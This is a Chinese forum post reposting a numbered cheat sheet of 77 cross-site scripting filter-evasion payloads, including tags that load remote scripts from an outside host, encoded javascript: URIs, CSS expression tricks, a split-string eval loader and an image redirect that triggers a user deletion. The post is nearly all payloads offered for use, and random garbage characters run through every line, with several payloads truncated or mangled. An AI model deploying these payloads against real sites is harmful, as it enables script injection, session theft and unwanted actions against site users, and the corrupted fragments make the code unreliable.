貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。2 q0 G% Y% `% B" \, v
3 T5 |$ N! a& U+ X1 G- n/ o. t. @
(1)普通的XSS JavaScript注入
7 e! M, H: X4 y! U9 j( r7 a) ^. z6 b$ J <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ N% W/ T! t) u' o# O9 v, W/ w+ m; X
3 F D5 o5 r1 n9 A1 j. R
(2)IMG标签XSS使用JavaScript命令
* b O" w) b+ k+ h# L+ [5 C& e. ? <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 N. A. U% O2 ]. P
7 \; z; N4 \, k8 B+ W9 S
(3)IMG标签无分号无引号+ I% w( R2 f. L
<IMG SRC=javascript:alert(‘XSS’)>. p& `, F9 Y8 [$ f* R+ ]0 d) u
6 p2 M2 i+ Q; T5 M, _% O (4)IMG标签大小写不敏感, F- C [ [! r
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
5 Z/ I* I5 @7 C1 \3 f& F* b9 Y' c4 \7 M7 R/ I
(5)HTML编码(必须有分号)
0 c, J. t4 m( j) ]4 a, R3 d9 @ <IMG SRC=javascript:alert(“XSS”)>. n" {, P- E- @/ z- M w
" L) X' B \8 A7 L$ q (6)修正缺陷IMG标签" O2 S0 t2 D+ ~; c' X8 f
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>, F1 Q6 W" ]4 t( h$ P! R
?/ W! f$ Y8 j4 D. a O2 [ (7)formCharCode标签(计算器)3 R( F; x" t7 h* x$ E: u: t% H! l( P
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>9 _7 Z* g5 C1 m& D. E/ y8 L
$ F" C$ U4 q2 @
(8)UTF-8的Unicode编码(计算器)% }: Y, E, |7 M; s5 D: ^0 d! H5 K
<IMG SRC=jav..省略..S')>( E! Y* d# X I4 e
8 A6 N0 o) k# X- F2 | (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
# @) n4 v; u; Z2 E6 d) g+ H) ~ <IMG SRC=jav..省略..S')>$ a2 [% u5 L. y8 X ?4 m
M, P, X( | I1 `+ `2 X3 E (10)十六进制编码也是没有分号(计算器) [2 q3 x: L$ X- y0 J: H4 t2 f
<IMG SRC=java..省略..XSS')>7 e0 Y: A! O& |9 `3 o4 M
% [4 t4 s0 d/ v4 S) i) X
(11)嵌入式标签,将Javascript分开6 I" t; r. j1 A
<IMG SRC=”jav ascript:alert(‘XSS’);”>. B2 t/ e" Z' W! s1 y
1 u* c) R( B) [ (12)嵌入式编码标签,将Javascript分开
, q$ d: r1 J% p0 b. v% _% @! Q/ B <IMG SRC=”jav ascript:alert(‘XSS’);”>
n* x' `. C2 |4 W1 B( G- u& T- y. |7 F. P: {" D
(13)嵌入式换行符9 ?8 y! p$ W4 U3 e- E! F% C) m% Y
<IMG SRC=”jav ascript:alert(‘XSS’);”>' Z+ M2 ]/ ^$ ~+ Z; p' [1 A" s$ |
9 K# y- H9 ^1 W# J( M+ o: g
(14)嵌入式回车
, @. p( Z; _& l1 @0 V0 ] <IMG SRC=”jav ascript:alert(‘XSS’);”>3 Y9 A7 ~3 ]' ~9 `" H
& D& X1 r9 n% v6 l: T (15)嵌入式多行注入JavaScript,这是XSS极端的例子
! ^) U( a1 `& Z1 P <IMG SRC=”javascript:alert(‘XSS‘)”>* k$ S) Y0 L9 f+ \
) M1 G5 Y% @0 k* }. T
(16)解决限制字符(要求同页面)* c! R. A6 A9 N7 J/ S; V% R& q
<script>z=’document.’</script>2 X, S2 l# y5 ^3 H4 P- |0 \
<script>z=z+’write(“‘</script>
# M, s1 K0 ~+ u/ D; M <script>z=z+’<script’</script>
7 p9 l g# _) O4 U9 V D) o <script>z=z+’ src=ht’</script>, m% u5 v4 s) Y1 K5 e
<script>z=z+’tp://ww’</script>
1 s k9 T4 y- s <script>z=z+’w.shell’</script>
+ X9 z7 B* H0 w- B$ h2 w* Q; j <script>z=z+’.net/1.’</script>8 u" U" A8 |8 l1 e! G
<script>z=z+’js></sc’</script>( I6 f& \2 P3 W
<script>z=z+’ript>”)’</script>
, R$ C4 h# x! u! W <script>eval_r(z)</script>5 P* B" Y# Y$ [& f& a
( H8 G. y, G5 F* j ^$ l (17)空字符
% `% Q* j+ w( i- i perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
( K( |5 F5 t0 _
( f7 M; X' q" P0 T (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用' a4 }1 \( q/ Y# B# [
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
* p7 `, \3 K, T2 ^% |9 s$ v8 [, u3 c8 U2 G' T
(19)Spaces和meta前的IMG标签6 G3 ^. w* x9 U3 A' q3 H% y$ B3 U( c
<IMG SRC=” � javascript:alert(‘XSS’);”>) L9 b! z: g# H* F
9 t6 J; _+ Z0 `. j4 n& Q' J; }
(20)Non-alpha-non-digit XSS
# w( q1 A1 q/ z# Y- W7 m. @ <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ Q) o1 I" l" k4 d5 V9 R
' j: @% \& z1 p! q
(21)Non-alpha-non-digit XSS to 2
- E: }7 c* y' g7 l5 p <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>; x+ x3 G% R* N0 G
# L: k# r; Q; n) b; T+ s (22)Non-alpha-non-digit XSS to 3
$ E. l* d6 @2 u8 M9 i% f <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 C' i" S$ z6 J
( S) D+ R+ B- W1 t0 o0 m (23)双开括号
9 p; v- g+ I1 a- H4 s* C& Z( V <<SCRIPT>alert(“XSS”);//<</SCRIPT>2 x3 C& U; q. |
% d4 v1 u, P/ J8 X (24)无结束脚本标记(仅火狐等浏览器)
, j, R; Y5 i+ I0 Z ? <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
* d/ m, C# F/ O" s, P0 ~' k
: n/ o5 b$ ?$ {% e; e8 ~6 E (25)无结束脚本标记22 l' I4 Y/ l% d! W, u0 c
<SCRIPT SRC=//3w.org/XSS/xss.js>
: D7 y0 t, ~" D3 l- \ O5 ]- d+ ]: P$ |! O- s
(26)半开的HTML/JavaScript XSS
! U. T6 c% }% u# l2 q <IMG SRC=”javascript:alert(‘XSS’)”
8 |& i0 c4 w- ]# K' `' X8 [/ U3 l, W- p- h5 G; p
(27)双开角括号
$ O: \0 m$ }1 x2 W4 A V6 k <iframe src=http://3w.org/XSS.html <
$ Q" G+ M* i/ V- ~$ K. X8 D0 N8 E3 n+ S* q' r
(28)无单引号 双引号 分号. m7 D+ v5 |2 k2 D' H: u
<SCRIPT>a=/XSS/
# z0 \$ q( ?: T( J8 x+ Q alert(a.source)</SCRIPT>
) ^! b- H" E7 |. u# l! [9 X% L6 o' g4 e. `- a& _( ]3 c
(29)换码过滤的JavaScript
; h0 w% E* d1 e8 @5 u2 `0 r \”;alert(‘XSS’);//
' z% Y/ m7 m: K" k9 p. j$ j3 A
& c9 U/ l( s2 i0 F (30)结束Title标签
9 g0 Q: T4 @$ l, S+ w </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
7 g6 K; d7 O& \0 M: H6 X. J9 l4 X" {$ b# \4 r8 e, k1 i
(31)Input Image
2 D9 M4 e. m$ }% E7 ~7 p <INPUT SRC=”javascript:alert(‘XSS’);”>
+ D" Z# t( N3 A% ]8 I2 o% }4 W2 t
# `4 i) Y. m; V7 e4 |' J+ C4 P (32)BODY Image
# w7 Z, C/ Q8 r; P <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- H8 D D5 G' G, Z
2 T- n& x9 K: v9 a) T) X5 H (33)BODY标签" Z( k/ ?; [) |0 j* }& ]6 V0 M& K
<BODY(‘XSS’)>2 s6 |7 b/ d1 k. q, l
2 g2 z% L3 T5 z! \0 \
(34)IMG Dynsrc
$ ]; p; x" W* G' _3 y <IMG DYNSRC=”javascript:alert(‘XSS’)”>( X7 Y5 x9 R+ |9 a( s+ N0 [. H
- _% f8 n5 y1 x: J" H' K
(35)IMG Lowsrc
* ]8 b2 c- A! u& U& r1 A+ S4 A <IMG LOWSRC=”javascript:alert(‘XSS’)”>( d7 ]# C% n1 s1 Z$ R! d
$ p* i: j9 E4 u z u: Y& E( [
(36)BGSOUND$ {9 g3 J, E L
<BGSOUND SRC=”javascript:alert(‘XSS’);”>( G; ]5 d6 w3 B0 d) U7 P
v3 S& d# p* `; n: g1 T1 E (37)STYLE sheet
1 X# h, R' i6 {7 N& J <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>! F- o+ ]( E I6 |+ t5 p
; o) P r% i$ W" P; n* v
(38)远程样式表
: e$ o+ j4 }& m1 J- D8 M <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>+ h* R; T$ Z8 r' K# ]7 M
* M% ^1 s9 ^5 S/ k. F4 H% o) o
(39)List-style-image(列表式) ?' s4 D9 e' i
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS$ O6 v' u3 J" q. r
, u( c6 A$ w( l e/ d% _8 Q
(40)IMG VBscript, F3 M. x% V! E) V* z8 B$ V9 q( ]$ P
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
, _* `( H/ \" y, |+ d7 \" |6 f
2 W( B( d2 ?/ A0 q% s, k1 a (41)META链接url1 ^. Q$ u9 y1 L! n5 h3 o
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
* c3 c) K$ Z; h8 N6 d2 B6 s2 P- K+ V" R9 e1 H+ j
(42)Iframe
' O) u9 v# r# j% ?6 x( G/ @: o% ^5 ^ <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- n3 i& M7 J9 G
3 K% `" T7 T) `& Z, m, c# [ (43)Frame: Y1 V X+ w8 m) c9 o
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
* ^$ C' V2 {8 K% W% b
. Q5 d, _7 q1 R* M2 A; J! L (44)Table
% i( e% k6 z q5 ?1 L3 A <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& j* k5 \9 C: w) d: ]
! c, ^4 a- R9 e5 w! N; c/ } (45)TD' R/ }9 n; k) Y8 x$ _ F
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
5 a# u; }6 n9 H6 M# u% n. o: }1 O; I: t4 P# h3 V! e
(46)DIV background-image* f7 N8 @) X! w7 _0 [% z
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>. W( n, ~ p' ^' M: A
( c1 _* x) y. J1 e( _
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279) B) Z4 a2 H6 N2 |5 |* q
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>8 ^- a% r; N& y0 o8 O
$ }: ]( @ V2 V3 @+ q (48)DIV expression
( D; f) I: [' `2 } <DIV STYLE=”width: expression_r(alert(‘XSS’));”>" x2 |- B* k# g3 ]' `% }
! t+ C/ N# D8 l
(49)STYLE属性分拆表达8 ?' O/ Q$ a2 V
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>9 |+ n3 _% q2 a$ J
- x) o# g2 a) G ]3 Z5 S! A! p
(50)匿名STYLE(组成:开角号和一个字母开头)
1 T$ B* |; Y9 `2 ?% l9 d5 I2 `! ^ <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
8 u4 \) U# d1 W& q% P& u0 ]0 [. S4 I% R6 z- ~! g
(51)STYLE background-image
3 J6 h3 D' J! `# n2 [0 O* q <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
) g3 G, g6 ?' x, {* V) b! o
% z W' j: P, F2 ^ (52)IMG STYLE方式
3 @3 G4 u( ?8 I2 b$ i& n! n exppression(alert(“XSS”))’>3 s" E$ E; O0 x& V! \2 L
* Y( f8 m; e, {
(53)STYLE background
Z) s( q" f, v( X1 V G <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
3 L) c; K, _; t! C% M% `8 b' N# a
3 ?( w' q0 K( V& X, I (54)BASE
. |& v! K' X+ w <BASE HREF=”javascript:alert(‘XSS’);//”>
* t1 d: ]2 V8 j% f z2 C% u2 b, I& P+ Y! k2 Y' n
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
1 v' P4 V, U b* P% Q: q4 d <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
6 I" C8 A0 f' V! h9 f* ?, D' k0 q' z. a
(56)在flash中使用ActionScrpt可以混进你XSS的代码( s8 y1 a! ?- ?( H# ~
a=”get”;5 q j0 H. V/ Z
b=”URL(\”";0 @/ Z' B* u: U) C3 R
c=”javascript:”;, S( v K/ K* W
d=”alert(‘XSS’);\”)”;/ }) c9 m/ b" p( H; y. w
eval_r(a+b+c+d); N- w* w% e& |: v% t
, X' O3 \/ Q4 r% f8 V2 d4 j (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
* w2 K6 O1 v( H! T% x+ a$ H9 u8 E <HTML xmlns:xss>
1 x- `7 L) V0 `8 Y" o0 a <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>) G# w$ Q1 U1 i( s9 i1 |3 z- i* f7 g
<xss:xss>XSS</xss:xss> p2 ]$ c$ s2 h0 P- ?
</HTML>
0 L& E! {$ r% B5 i% x: M& y) ^: _, ?$ ~/ _, N( A& Q) A
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用& j' N0 a( X- g1 {3 A3 ]1 H
<SCRIPT SRC=””></SCRIPT>
7 C' p5 _" p0 ]9 }' [
$ E0 [' @( x& b/ h& W (59)IMG嵌入式命令,可执行任意命令: X0 K$ k h e9 C/ U" F
<IMG SRC=”http://www.XXX.com/a.php?a=b”>9 x- z1 Z% \7 p/ c) |( q
8 t9 q- \' s& X7 h
(60)IMG嵌入式命令(a.jpg在同服务器)
* P# D H+ d; j# B, s9 @7 l Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser' Y; U5 L1 D7 {. {6 t! y
0 |, P* t7 S0 ^5 g0 k5 P1 ]
(61)绕符号过滤9 S/ x; d8 {4 ^: ^, b
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 z! o6 b. m, |; g- h) X. E( v# I0 w- F! v+ |
(62)5 K4 q6 A; ^" `6 D4 a6 Z5 [
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 w5 b; e& l' R7 T) k% K0 O" N* \/ v+ e: e, |* m3 M
(63)( z; m# ^- h1 ^+ m
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>2 c' m" ^: [" L$ C$ ]9 p
& A: Q1 N) V$ X, ^# g2 B* M (64)
% t4 p4 u+ r [3 s7 g <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>( s( T$ l4 G; Z3 C7 V4 o i4 |
& }8 F* }/ z ?& h% I: I( b9 y( T (65)
$ o* b2 ?1 K2 p H% R3 r9 Y <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
" u4 U1 k9 V3 o: o9 y3 m
6 |! M) [5 ~9 @" `& q% w3 R (66)
. U( J) _! {0 c <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 g% _) m% X5 i6 _/ w1 m
4 A: @- p" f" R$ t" L (67)) G9 Q" t, o$ N, L& C
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
& z& [- x0 G# V+ G2 n( r2 C- F/ r
# r) M4 l D& F# C (68)URL绕行) @2 c& S5 F1 q/ D. d
<A HREF=”http://127.0.0.1/”>XSS</A>
8 g3 a6 W7 e1 t/ }5 \. P
+ H2 `' i E' K& H: h (69)URL编码
* A' F7 b' u2 ` <A HREF=”http://3w.org”>XSS</A>
6 o+ n. x: X' d+ \8 l' }2 v$ l, V# f6 O2 u6 D3 A
(70)IP十进制& Z w$ \7 Y5 |. f9 K
<A HREF=”http://3232235521″>XSS</A>' v! m7 t/ J% N$ t
( W X% k H" f/ }2 Z2 A7 H) K! I
(71)IP十六进制
3 k2 j. n3 d0 p! ], R <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A># a3 |5 @2 m& s- C9 a% u
! r- _. v+ T- ]8 [0 L (72)IP八进制9 q& C* z. \* {9 _9 Z: R4 M0 _
<A HREF=”http://0300.0250.0000.0001″>XSS</A>7 E3 F0 A5 _1 c: P0 F* w. Y6 ]( }
& T* _- h8 M. e: S( A (73)混合编码4 L5 C4 F6 m. }/ X9 E6 h
<A HREF=”h0 V# C$ z) a5 b e& _; \! o5 d x
tt p://6 6.000146.0×7.147/”">XSS</A>1 L9 X1 ]& c& Q1 c! c& J
3 i5 d9 A3 G" t+ ^! C* w+ e
(74)节省[http:]; O5 K* ~! U" H, V4 X% F8 |9 {6 q" P* a
<A HREF=”//www.google.com/”>XSS</A>
5 u0 g% A; V6 Q
; y+ V1 ?: R- _/ A (75)节省[www]* v) \1 ^ d/ K0 Q4 N3 h2 |
<A HREF=”http://google.com/”>XSS</A>' m3 V1 T9 X- n8 K
; a: L( N1 f& ?* R5 m( x1 a/ }4 V" a. M (76)绝对点绝对DNS
1 v. L" _9 w- `7 ] <A HREF=”http://www.google.com./”>XSS</A>
3 M9 T! G- t' ?$ s7 e; F+ l5 \: a6 O7 K. d' ]2 [7 B/ f- P: g' M" h
(77)javascript链接
6 I8 I3 O- A+ I <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对